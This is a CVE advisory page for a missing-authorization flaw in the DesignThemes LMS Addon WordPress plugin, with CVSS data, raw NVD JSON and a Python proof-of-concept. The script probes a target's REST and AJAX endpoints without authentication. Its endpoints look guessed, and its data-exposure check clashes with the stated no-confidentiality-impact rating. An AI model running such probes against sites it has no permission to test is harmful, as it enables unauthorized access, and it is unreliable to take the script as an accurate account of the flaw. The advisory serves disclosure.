Security Vulnerability Report
中文
CVE-2025-68982 CVSS 5.3 MEDIUM

CVE-2025-68982

Published: 2025-12-30 11:15:57
Last Modified: 2026-04-27 19:16:39

Description

Missing Authorization vulnerability in designthemes DesignThemes LMS Addon designthemes-lms-addon allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects DesignThemes LMS Addon: from n/a through <= 2.6.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

DesignThemes LMS Addon <= 2.6 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-68982 PoC - Missing Authorization in DesignThemes LMS Addon # Target: WordPress site with DesignThemes LMS Addon plugin <= 2.6 TARGET_URL = "http://target-wordpress-site.com" # List of endpoints that should require authorization but may be accessible ENDPOINTS = [ "/wp-json/lms/v1/courses", "/wp-json/lms/v1/lessons", "/wp-json/lms/v1/users", "/wp-admin/admin-ajax.php", ] def check_vulnerability(): """Check if the target is vulnerable to CVE-2025-68982""" print(f"[*] Testing {TARGET_URL} for CVE-2025-68982") for endpoint in ENDPOINTS: url = f"{TARGET_URL}{endpoint}" try: # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) # Check if we can access protected resources if response.status_code == 200: # Check response content for sensitive data if '"id"' in response.text or '"user"' in response.text: print(f"[+] VULNERABLE: {url} - Access control bypass detected") print(f" Status: {response.status_code}") return True elif response.status_code == 401 or response.status_code == 403: print(f"[-] PROTECTED: {url} - Requires authentication") except Exception as e: print(f"[!] Error testing {url}: {e}") print("[*] No obvious vulnerability detected, manual verification recommended") return False if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68982", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:56.853", "lastModified": "2026-04-27T19:16:39.323", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in designthemes DesignThemes LMS Addon designthemes-lms-addon allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects DesignThemes LMS Addon: from n/a through <= 2.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/designthemes-lms-addon/vulnerability/wordpress-designthemes-lms-addon-plugin-2-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}